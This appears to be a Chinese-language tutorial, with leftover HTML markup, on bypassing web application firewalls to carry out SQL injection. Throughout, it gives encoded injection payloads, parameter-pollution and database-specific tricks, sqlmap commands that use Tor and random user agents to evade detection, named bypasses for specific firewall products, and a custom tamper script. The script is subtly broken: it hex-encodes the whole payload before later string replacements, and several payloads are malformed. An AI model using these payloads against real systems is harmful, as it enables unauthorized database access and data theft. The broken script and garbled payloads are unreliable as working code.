WAF绕过与SQL注入方法详解<\/h1>

一、编码绕过技术<\/h2>

1. URL编码绕过<\/h3>

单次URL编码<\/strong>：<\/p>

将特殊字符转换为%<\/code>加十六进制值<\/li>
示例：?id=1%20union%20select%201<\/code>（%20<\/code>代表空格）<\/li> <\/ul> 二次URL编码<\/strong>：<\/p> 针对仅解码一次的WAF<\/li> 示例：?id=1%2520union%2520select%25201<\/code>（%2520<\/code>解析为%20<\/code>，然后解码为空格）<\/li> <\/ul> NULL字节截断<\/strong>：<\/p> 使用%00<\/code>截断WAF解析<\/li> 示例：?id=1%00union%20select%201<\/code><\/li> <\/ul> SQLMap命令<\/strong>：<\/p> sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --tamper=<\/span>percent <\/span><\/span>sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --tamper=<\/span>url_double_encode <\/span><\/span>sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --hex <\/span><\/span><\/code><\/pre>2. Unicode编码绕过<\/h3> 方法<\/strong>：<\/p> 替换关键字符：?id=un%u0069on%20select%201<\/code>（%u0069<\/code>代表i<\/code>）<\/li> 混合编码：?id=sel%u0065ct%20f%u0072om%20users<\/code><\/li> <\/ul> SQLMap命令<\/strong>：<\/p> sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --tamper=<\/span>charunicodeencode <\/span><\/span><\/code><\/pre>3. Hex\/ASCII编码绕过<\/h3> 十六进制表示<\/strong>：<\/p> MSSQL示例：?id=1;exec(0x730065006c00650063007400200075007300650072)<\/code>（select user<\/code>的HEX编码）<\/li> <\/ul> 字符拼接<\/strong>：<\/p> MySQL示例：?id=1+union+select+CONCAT(0x7e,version())<\/code><\/li> <\/ul> 二、协议与请求特性绕过<\/h2> 1. HTTP参数污染<\/h3> 同名参数覆盖<\/strong>：<\/p> ?id=1&id=union+select+1,2,3<\/code><\/li> <\/ul> 参数拆分<\/strong>：<\/p> ?id=1+union&id=select&id=1+from+admin<\/code><\/li> <\/ul> 2. 请求方法欺骗<\/h3> GET转POST<\/strong>：<\/p> POST<\/span> \/index.php HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> example.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 25<\/span> <\/span><\/span> <\/span><\/span>id=1+union+select+1,2,3 <\/span><\/span><\/code><\/pre>非常规方法<\/strong>：<\/p> HEAD<\/span> \/?id=1+union+select+1 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> example.com<\/span> <\/span><\/span><\/code><\/pre>SQLMap命令<\/strong>：<\/p> sqlmap -u "http:\/\/example.com\/index.php"<\/span> --method=<\/span>POST --data=<\/span>"id=1"<\/span> <\/span><\/span>sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --force-ssl <\/span><\/span><\/code><\/pre>三、数据库特性绕过<\/h2> 1. MySQL绕过技术<\/h3> 松散空格<\/strong>：<\/p> 使用+<\/code>或\/**\/<\/code>代替空格<\/li> 示例：?id=1+union\/**\/select\/**\/1<\/code><\/li> <\/ul> 内联执行<\/strong>：<\/p> 示例：?id=1+\/*!50001union*+\/*!50001select*\/database()<\/code><\/li> <\/ul> SQLMap命令<\/strong>：<\/p> sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --tamper=<\/span>space2plus --dbms=<\/span>mysql <\/span><\/span><\/code><\/pre>2. MSSQL绕过技术<\/h3> HEX编码<\/strong>：<\/p> 示例：?id=1;exec(0x770061006900740066006f0072002000640065006c0061007900)<\/code><\/li> <\/ul> 变量声明<\/strong>：<\/p> 示例：?id=1;declare @a varchar(50);set @a='sel'+'ect user';exec(@a)<\/code><\/li> <\/ul> SQLMap命令<\/strong>：<\/p> sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --dbms=<\/span>mssql --hex <\/span><\/span><\/code><\/pre>四、规则策略绕过<\/h2> 1. 关键字拆分与替换<\/h3> 双写绕过<\/strong>：<\/p> ?id=1+ununionion+selselectect+1<\/code><\/li> <\/ul> 符号替换<\/strong>：<\/p> ?id=1||1=1<\/code>（||<\/code>代替OR<\/code>）<\/li> <\/ul> 2. 白名单与速率限制绕过<\/h3> 伪造User-Agent<\/strong>：<\/p> GET<\/span> \/?id=1+union+select+1 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> example.com<\/span> <\/span><\/span>User-Agent:<\/span> Baiduspider<\/span> <\/span><\/span><\/code><\/pre>低频率请求<\/strong>：<\/p> 使用Burp Intruder设置多个代理IP轮询<\/li> <\/ul> SQLMap命令<\/strong>：<\/p> sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --random-agent --tor --proxy=<\/span>http:\/\/127.0.0.1:8080 <\/span><\/span><\/code><\/pre>五、SQLMap高级绕过组合<\/h2> 常见组合命令<\/h3> sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --dbs --random-agent --tamper=<\/span>between,charunicodeencode,percent <\/span><\/span>sqlmap -u "http:\/\/example.com\/index.php"<\/span> --data=<\/span>"id=1"<\/span> --method=<\/span>POST --dbs --tamper=<\/span>space2comment <\/span><\/span>sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --dbs --level=<\/span>5<\/span> --risk=<\/span>3<\/span> --random-agent --hex --tamper=<\/span>between,space2comment <\/span><\/span><\/code><\/pre>六、多功能SQLMap Tamper脚本<\/h2> 脚本功能<\/h3> URL双重编码（%20<\/code>→%2520<\/code>）<\/li> 空格替换+<\/code><\/li> =<\/code>替换为LIKE<\/code><\/li> SQL关键字大小写混淆<\/li> SQL关键字注释混淆（SELECT<\/code>→\/**\/SELECT\/**\/<\/code>）<\/li> 十六进制编码<\/li> 关键字双写绕过（SELECT<\/code>→SELECTSELECT<\/code>）<\/li> URL空格换行符绕过（+<\/code>替换为%0A<\/code>）<\/li> <\/ol> 脚本代码<\/h3> import<\/span> binascii <\/span><\/span>import<\/span> random <\/span><\/span>from<\/span> lib.core.enums import<\/span> PRIORITY <\/span><\/span> <\/span><\/span>__priority__ =<\/span> PRIORITY.<\/span>NORMAL <\/span><\/span> <\/span><\/span>def<\/span> dependencies<\/span>(): <\/span><\/span> pass<\/span> <\/span><\/span> <\/span><\/span>def<\/span> tamper<\/span>(payload, **<\/span>kwargs): <\/span><\/span> if<\/span> not<\/span> payload: <\/span><\/span> return<\/span> payload <\/span><\/span> <\/span><\/span> # 1. URL双重编码<\/span> <\/span><\/span> payload =<\/span> payload.<\/span>replace(" "<\/span>, "%20"<\/span>).<\/span>replace("%"<\/span>, "%25"<\/span>) <\/span><\/span> <\/span><\/span> # 2. 空格替换`+`<\/span> <\/span><\/span> payload =<\/span> payload.<\/span>replace("%20"<\/span>, "+"<\/span>) <\/span><\/span> <\/span><\/span> # 3. 替换`=`为`LIKE`<\/span> <\/span><\/span> payload =<\/span> payload.<\/span>replace("="<\/span>, " LIKE "<\/span>) <\/span><\/span> <\/span><\/span> # 4. SQL关键字大小写混淆(随机大小写)<\/span> <\/span><\/span> new_payload =<\/span> ""<\/span> <\/span><\/span> for<\/span> char in<\/span> payload: <\/span><\/span> if<\/span> char.<\/span>isalpha() and<\/span> random.<\/span>choice([True<\/span>, False<\/span>]): <\/span><\/span> new_payload +=<\/span> char.<\/span>upper() <\/span><\/span> else<\/span>: <\/span><\/span> new_payload +=<\/span> char.<\/span>lower() <\/span><\/span> payload =<\/span> new_payload <\/span><\/span> <\/span><\/span> # 5. SQL关键字注释混淆<\/span> <\/span><\/span> keywords =<\/span> ["SELECT"<\/span>, "UNION"<\/span>, "FROM"<\/span>, "WHERE"<\/span>, "INSERT"<\/span>, "UPDATE"<\/span>, "DELETE"<\/span>] <\/span><\/span> for<\/span> keyword in<\/span> keywords: <\/span><\/span> payload =<\/span> payload.<\/span>replace(keyword, f<\/span>"\/**\/<\/span>{<\/span>keyword}<\/span>\/**\/"<\/span>) <\/span><\/span> <\/span><\/span> # 6. 十六进制编码<\/span> <\/span><\/span> hex_payload =<\/span> "0x"<\/span> +<\/span> binascii.<\/span>hexlify(payload.<\/span>encode()).<\/span>decode() <\/span><\/span> payload =<\/span> hex_payload <\/span><\/span> <\/span><\/span> # 7. 关键字双写绕过<\/span> <\/span><\/span> for<\/span> keyword in<\/span> keywords: <\/span><\/span> payload =<\/span> payload.<\/span>replace(keyword, keyword *<\/span> 2<\/span>) <\/span><\/span> <\/span><\/span> # 8. URL空格换行符绕过<\/span> <\/span><\/span> payload =<\/span> payload.<\/span>replace("+"<\/span>, "%0A"<\/span>) <\/span><\/span> <\/span><\/span> return<\/span> payload <\/span><\/span><\/code><\/pre>使用方式<\/h3> sqlmap -u "http:\/\/example.com\/index.php?id=1"<\/span> --tamper=<\/span>combined_bypass <\/span><\/span><\/code><\/pre>七、实战案例<\/h2> 安全狗绕过<\/strong>：<\/p> %00<\/code>截断：?id=1%00union%20select%201<\/code><\/li> 逻辑混淆：?id=1+a%n%d+1=1<\/code><\/li> <\/ul> <\/li> Discuz X绕过<\/strong>：<\/p> 反引号绕过：?id=@'\union\select\1\from\admin<\/code><\/li> <\/ul> <\/li> IIS绕过<\/strong>：<\/p> 字符编码混淆：?id=SEL%E%CT%201+FROM%20users<\/code><\/li> <\/ul> <\/li> <\/ol>